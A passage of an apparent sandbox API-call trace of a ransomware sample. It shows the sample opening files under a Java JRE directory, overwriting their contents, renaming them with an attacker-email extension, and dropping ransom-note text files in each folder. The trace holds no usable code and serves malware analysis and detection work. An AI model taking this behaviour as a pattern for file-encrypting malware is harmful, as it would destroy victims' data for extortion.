_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.576] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="win32_MoveNoDrop32x32.gif") returned 0x0 [0097.576] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 0x50 [0097.576] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0097.578] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd280*=0x99, lpOverlapped=0x0) returned 1 [0097.580] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.580] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.580] _errno () returned 0x84b1160840 [0097.580] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.580] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd280*=0xa0, lpOverlapped=0x0) returned 1 [0097.580] CloseHandle (hObject=0x1ac) returned 1 [0097.580] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.581] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.581] __uncaught_exception () returned 0x84b1160800 [0097.581] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.583] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movenodrop32x32.gif"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\win32_movenodrop32x32.gif.[evil@cock.lu].evil")) returned 1 [0097.584] ??_V@YAXPEAX@Z () returned 0x1 [0097.586] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif", dwFileAttributes=0x0) returned 0 [0097.587] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0097.587] FindClose (in: hFindFile=0x84b11dd080 | out: hFindFile=0x84b11dd080) returned 1 [0097.587] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors") returned 0x36 [0097.587] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.587] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.587] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.587] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.587] __uncaught_exception () returned 0x84b1160800 [0097.587] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.588] FindNextFileW (in: hFindFile=0x84b11dd860, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0097.588] FindClose (in: hFindFile=0x84b11dd860 | out: hFindFile=0x84b11dd860) returned 1 [0097.588] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images") returned 0x2e [0097.588] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.588] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.588] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.589] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.589] __uncaught_exception () returned 0x84b1160800 [0097.589] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.589] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.589] wcsstr (_Str="javafx.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.589] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties") returned 57 [0097.589] wcscmp (_String1="javafx.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.589] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javafx.properties") returned 0x0 [0097.589] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties") returned 0x39 [0097.589] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javafx.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.591] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x38, lpOverlapped=0x0) returned 1 [0097.593] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.593] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.593] _errno () returned 0x84b1160840 [0097.593] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.593] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x40, lpOverlapped=0x0) returned 1 [0097.593] CloseHandle (hObject=0x1a4) returned 1 [0097.593] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.594] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.594] __uncaught_exception () returned 0x84b1160800 [0097.594] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.594] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javafx.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javafx.properties.[evil@cock.lu].evil")) returned 1 [0097.604] ??_V@YAXPEAX@Z () returned 0x1 [0097.607] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties", dwFileAttributes=0x0) returned 0 [0097.607] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.607] wcsstr (_Str="javaws.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.607] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar") returned 50 [0097.607] wcscmp (_String1="javaws.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.607] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="javaws.jar") returned 0x0 [0097.607] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar") returned 0x32 [0097.607] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javaws.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.609] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xe5b44, lpOverlapped=0x0) returned 1 [0097.637] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.637] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.637] _errno () returned 0x84b1160840 [0097.638] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xe5b60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xe5b60, lpOverlapped=0x0) returned 1 [0097.640] CloseHandle (hObject=0x1a4) returned 1 [0097.641] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.642] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.642] __uncaught_exception () returned 0x84b1160800 [0097.642] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.642] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javaws.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\javaws.jar.[evil@cock.lu].evil")) returned 1 [0097.642] ??_V@YAXPEAX@Z () returned 0x1 [0097.645] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\javaws.jar", dwFileAttributes=0x0) returned 0 [0097.645] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.645] wcsstr (_Str="jce.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.645] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar") returned 47 [0097.645] wcscmp (_String1="jce.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.645] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jce.jar") returned 0x0 [0097.645] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar") returned 0x2f [0097.645] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jce.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.647] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1c6de, lpOverlapped=0x0) returned 1 [0097.650] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.650] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.650] _errno () returned 0x84b1160840 [0097.650] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.650] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1c6e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1c6e0, lpOverlapped=0x0) returned 1 [0097.651] CloseHandle (hObject=0x1a4) returned 1 [0097.651] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.651] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.651] __uncaught_exception () returned 0x84b1160800 [0097.651] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.651] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jce.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jce.jar.[evil@cock.lu].evil")) returned 1 [0097.652] ??_V@YAXPEAX@Z () returned 0x1 [0097.654] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jce.jar", dwFileAttributes=0x0) returned 0 [0097.654] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.654] wcsstr (_Str="jfr", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.655] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr") returned 43 [0097.655] wcscmp (_String1=".", _String2="jfr") returned -1 [0097.655] wcscmp (_String1="..", _String2="jfr") returned -1 [0097.655] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr") returned 0x2b [0097.655] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr") returned 0x0 [0097.655] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\*" [0097.655] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd620 [0097.655] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\.") returned 45 [0097.655] wcscmp (_String1=".", _String2=".") returned 0 [0097.655] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.655] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\..") returned 46 [0097.655] wcscmp (_String1=".", _String2="..") returned -1 [0097.655] wcscmp (_String1="..", _String2="..") returned 0 [0097.655] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.655] wcsstr (_Str="default.jfc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.655] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc") returned 55 [0097.655] wcscmp (_String1="default.jfc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.655] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="default.jfc") returned 0x0 [0097.655] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc") returned 0x37 [0097.655] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\default.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.657] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e8d, lpOverlapped=0x0) returned 1 [0097.660] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.660] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.660] _errno () returned 0x84b1160840 [0097.660] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.660] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x4ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ea0, lpOverlapped=0x0) returned 1 [0097.660] CloseHandle (hObject=0x1a8) returned 1 [0097.660] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.660] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.660] __uncaught_exception () returned 0x84b1160800 [0097.660] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.660] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\default.jfc"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\default.jfc.[evil@cock.lu].evil")) returned 1 [0097.661] ??_V@YAXPEAX@Z () returned 0x1 [0097.663] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\default.jfc", dwFileAttributes=0x0) returned 0 [0097.664] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0097.664] wcsstr (_Str="profile.jfc", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.664] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc") returned 55 [0097.664] wcscmp (_String1="profile.jfc", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.664] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="profile.jfc") returned 0x0 [0097.664] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc") returned 0x37 [0097.664] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\profile.jfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0097.666] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4e61, lpOverlapped=0x0) returned 1 [0097.668] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.668] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.668] _errno () returned 0x84b1160840 [0097.668] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.668] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4e80, lpOverlapped=0x0) returned 1 [0097.668] CloseHandle (hObject=0x1a8) returned 1 [0097.668] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.669] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.669] __uncaught_exception () returned 0x84b1160800 [0097.669] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.669] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\profile.jfc"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr\\profile.jfc.[evil@cock.lu].evil")) returned 1 [0097.669] ??_V@YAXPEAX@Z () returned 0x1 [0097.672] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\profile.jfc", dwFileAttributes=0x0) returned 0 [0097.672] FindNextFileW (in: hFindFile=0x84b11dd620, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0097.672] FindClose (in: hFindFile=0x84b11dd620 | out: hFindFile=0x84b11dd620) returned 1 [0097.672] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr") returned 0x2b [0097.672] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.672] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0097.672] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.673] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0097.673] __uncaught_exception () returned 0x84b1160800 [0097.674] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.674] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.674] wcsstr (_Str="jfr.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.674] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar") returned 47 [0097.674] wcscmp (_String1="jfr.jar", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0097.674] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="jfr.jar") returned 0x0 [0097.674] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar") returned 0x2f [0097.674] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0097.676] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x88dc5, lpOverlapped=0x0) returned 1 [0097.697] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.697] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0097.697] _errno () returned 0x84b1160840 [0097.698] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.698] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x88de0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x88de0, lpOverlapped=0x0) returned 1 [0097.698] CloseHandle (hObject=0x1a4) returned 1 [0097.698] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0097.699] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0097.699] __uncaught_exception () returned 0x84b1160800 [0097.699] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0097.699] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\jfr.jar.[evil@cock.lu].evil")) returned 1 [0097.699] ??_V@YAXPEAX@Z () returned 0x1 [0097.702] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\jfr.jar", dwFileAttributes=0x0) returned 0 [0097.702] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0097.702] wcsstr (_Str="jfxswt.jar", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0097.702] 